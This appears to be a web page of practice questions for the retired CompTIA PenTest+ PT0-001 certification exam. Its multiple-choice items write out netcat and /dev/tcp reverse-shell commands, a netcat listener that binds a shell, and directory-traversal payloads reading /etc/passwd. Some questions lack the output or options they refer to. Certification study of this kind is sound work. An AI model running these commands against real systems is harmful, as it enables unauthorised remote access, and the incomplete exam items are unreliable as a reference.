
PT0-001 Questions and Answers

Note! Following PT0-001 Exam is Retired now. Please select the alternative replacement for your Exam Certification. The new exam code is PT0-002


Question # 6

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO)

A.

nc 192.168.1.5 44444

B.

nc -nlvp 4444 -e /bin/sh

C.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.5 44444 > /tmp/f

D.

nc -e /bin/sh 192.168.1.5 4444

E.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.5 444444 > /tmp/f

F.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.5.1 44444 > /tmp/f

Question # 7

After successfully enumerating users on an Active Directory domain controller using enum4linux, a penetration tester wants to conduct a password-guessing attack. Given the below output:

Which of the following can be used to extract usernames from the above output prior to conducting the attack?

A.

cat enum4linux_output.txt > grep -v user | sed 's/\[//' | sed 's/\]//' 2> usernames.txt

B.

grep user enum4linux_output.txt | awk '{print $1}' | cut -d[ -f2 | cut -d] -f1 > username.txt

C.

grep -i rid < enum4linux_output.txt | cut -d: -f2 | cut -d] -f1 > usernames.txt

D.

cut -d: -f2 enum4linux_output.txt | awk '{print $2}' | cut -d: -f1 > usernames.txt

Question # 8

A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

A.

Download the GHOST file to a Linux system and compile: gcc -o GHOST; test: ./GHOST

B.

Download the GHOST file to a Windows system and compile: gcc -o GHOST GHOST.c; test: ./GHOST

C.

Download the GHOST file to a Linux system and compile: gcc -o GHOST.c; test: ./GHOST

D.

Download the GHOST file to a Windows system and compile: gcc -o GHOST; test: ./GHOST

Question # 9

During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function. Which of the following mitigations is BEST for the consultant to conduct?

A.

Update to the latest Microsoft Windows OS.

B.

Put the machine behind the WAF.

C.

Segment the machine from the main network.

D.

Disconnect the machine.

Question # 10

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

http://www.company-site.com/about.php?i=../../../../../etc/passwd

Which of the following attack types is MOST likely to be the vulnerability?

A.

Directory traversal

B.

Cross-site scripting

C.

Remote file inclusion

D.

User enumeration

Question # 11

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

A.

schtasks.exe /create /tr "powershell.exe" Sv.ps1 /run

B.

net session server | dsquery -user | net use c$

C.

powershell && set-executionpolicy unrestricted

D.

reg save HKLM\System\CurrentControlSet\Services\Sv.reg

Question # 12

A client gives a penetration tester a /8 network range to scan during a week-long engagement. Which of the following tools would BEST complete this task quickly?

A.

Masscan

B.

Nmap

C.

Angry IP scanner

D.

Unicorn scan

Question # 13

A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?

A.

The physical location and network ESSIDs to be tested

B.

The number of wireless devices owned by the client

C.

The client's preferred wireless access point vendor

D.

The bands and frequencies used by the client's devices

Question # 14

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

A.

Sample SOAP messages

B.

The REST API documentation

C.

A protocol fuzzing utility

D.

An applicable XSD file

Question # 15

After successfully capturing administrator credentials to a remote Windows machine, a penetration tester attempts to access the system using PSExec but is denied permission. Which of the following shares must be accessible for a successful PSExec connection?

A.

IPC$ and C$

B.

C$ and ADMIN$

C.

SERVICES and ADMIN$

D.

ADMIN$ and IPC$

Question # 16

A client's systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory. Which of the following is the penetration tester's BEST course of action?

A.

Send the report since the systems administrator will be in charge of implementing the fixes.

B.

Send the report and carbon copy the point of contact/signatory for visibility.

C.

Reply and explain to the systems administrator that proper authorization is needed to provide the report.

D.

Forward the request to the point of contact/signatory for authorization.

Question # 17

A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?

A.

The badge was cloned.

B.

The physical access control server is malfunctioning.

C.

The system reached the crossover error rate.

D.

The employee lost the badge.

Question # 18

A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the login portal. The tester will leverage multiple proxies to mask the origin IPs of the attack. Which of the following threat actors will be emulated?

A.

APT

B.

Hacktivist

C.

Script kiddie

D.

Insider threat

Question # 19

A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have helped the penetration tester identify this vulnerability?

A.

'or 'folder' like 'file'; --

B.

|| ls /tmp/

C.

">

D.

&& dir C:/

E.

../../../../../../../../

Question # 20

A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

A.

nc -l -p 4444 /bin/bash

B.

nc -vp 4444 /bin/bash

C.

nc -p 4444 /bin/bash

D.

nc -lp 4444 -e /bin/bash

Question # 21

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

A.

dsrm -users "DN=company.com; OU=hq CN=usera"

B.

dsuser -name -account -limit 3

C.

dsquery user -inactive 3

D.

dsquery -o -rein -limit 21

Question # 22

After delivering a draft of a penetration test report, a development team has raised concerns about an issue categorized as "high." A cloud storage bucket is configured to allow read access to the public, but writing to objects within the bucket is restricted to authorized users. The bucket contains only publicly available images that can already be found on the application homepage. Which of the following severity levels should the penetration tester consider?

A.

Critical

B.

Medium

C.

Informational

D.

Low

Question # 23

A penetration tester has gained a root shell on a target Linux server and wants to have the server "check in" over HTTP using a GET request to the penetration tester's laptop once every hour, even after system reboots. The penetration tester wrote a bash script to perform this. Which of the following represents the BEST method to persist the script?

A.

Execute the script to run in a screen session.

B.

Use the nohup command to launch the script immune to logouts.

C.

Configure a systemd service at default run level to launch the script.

D.

Modify .bash_profile to launch the script in the background.

Question # 24

In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

A.

Common libraries

B.

Configuration files

C.

Sandbox escape

D.

ASLR bypass

Question # 25

A penetration tester successfully exploits a Windows host and dumps the hashes. Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?

A)

B)

C)

D)

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Question # 26

A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake. Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

A.

Subject key identifier

B.

Subject alternative name

C.

Authority information access

D.

Service principal name

Question # 27

The following line was found in an exploited machine's history file. An attacker ran the following command:

bash -i >& /dev/tcp/192.168.0.1/80 0>&1

Which of the following describes what the command does?

A.

Performs a port scan.

B.

Grabs the web server's banner.

C.

Redirects a TTY to a remote system.

D.

Removes error logs for the supplied IP.

Question # 28

A penetration tester wants to script out a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A.

nmap -p 53 -oG dnslist.txt | cut -d ":" -f 4

B.

nslookup -ns 8.8.8.8 << dnslist.txt

C.

for x in (1…254); do dig -x 192.168. $x. $x; done

D.

dig -r > echo "8.8.8.8" >> /etc/resolv/conf

Question # 29

An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application's network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing proxying of all traffic?

A.

Misconfigured routes

B.

Certificate pinning

C.

Strong cipher suites

D.

Closed ports

Question # 30

Given the following Python script:

Which of the following actions will it perform?

A.

ARP spoofing

B.

Port scanner

C.

Reverse shell

D.

Banner grabbing

Question # 31

Which of the following is the purpose of an NDA?

A.

Outlines the terms of confidentiality between both parties

B.

Outlines the boundaries of which systems are authorized for testing

C.

Outlines the requirements of technical testing that are allowed

D.

Outlines the detailed configuration of the network

Question # 32

A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

A.

Karma attack

B.

Deauthentication attack

C.

Fragmentation attack

D.

SSID broadcast flood

Question # 33

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

A.

Expand the password length from seven to 14 characters

B.

Implement password history restrictions

C.

Configure password filters

D.

Disable the accounts after five incorrect attempts

E.

Decrease the password expiration window

Question # 34

Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

A.

Mimikatz

B.

BeEF

C.

Nikto

D.

Patator

Question # 35

Performance based

You are a penetration tester reviewing a client's website through a web browser.

Instructions:

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate source or cookies.

Question # 36

A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?

A.

DNS cache poisoning

B.

Record and replay

C.

Supervisory server SMB

D.

Blind SQL injection

Question # 37

A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?

A.

Insider threat

B.

Nation state

C.

Script kiddie

D.

Cybercrime organization.

Question # 38

A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

A.

Vulnerability scan

B.

Dynamic scan

C.

Static scan

D.

Compliance scan

Question # 39

A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete after the tester delivers the report?

A.

Removing shells

B.

Obtaining client acceptance

C.

Removing tester-created credentials

D.

Documenting lessons learned

E.

Presenting attestation of findings

Question # 40

An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email to obtain the CEO's login credentials. Which of the following types of attacks is this an example of?

A.

Elicitation attack

B.

Impersonation attack

C.

Spear phishing attack

D.

Drive-by download attack

Question # 41

An Internet-accessible database server was found with the following ports open: 22, 53, 110, 1433, and 3389. Which of the following would be the BEST hardening technique to secure the server?

A.

Ensure all protocols are using encryption.

B.

Employ network ACLs.

C.

Disable source routing on the server.

D.

Ensure the IDS rules have been updated.

Question # 42

A penetration tester has successfully exploited a vulnerability on an organization's authentication server and now wants to set up a reverse shell. The penetration tester finds that Netcat is not available on the target. Which of the following approaches is a suitable option to attempt NEXT?

A.

Run xterm to connect to the X-server of the target.

B.

Attempt to escalate privileges to acquire an interactive shell.

C.

Try to use the /dev/tcp socket.

D.

Attempt to read out /etc/shadow.

Question # 43


Which of the following is the MOST comprehensive type of penetration test on a network?

A.

Black box

B.

White box

C.

Gray box

D.

Red team

E.

Architecture review

Question # 44

A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the network. Which of the following is the BEST approach to take?

A.

Run a network vulnerability scan.

B.

Run a stress test.

C.

Run an MITM attack.

D.

Run a port scan.
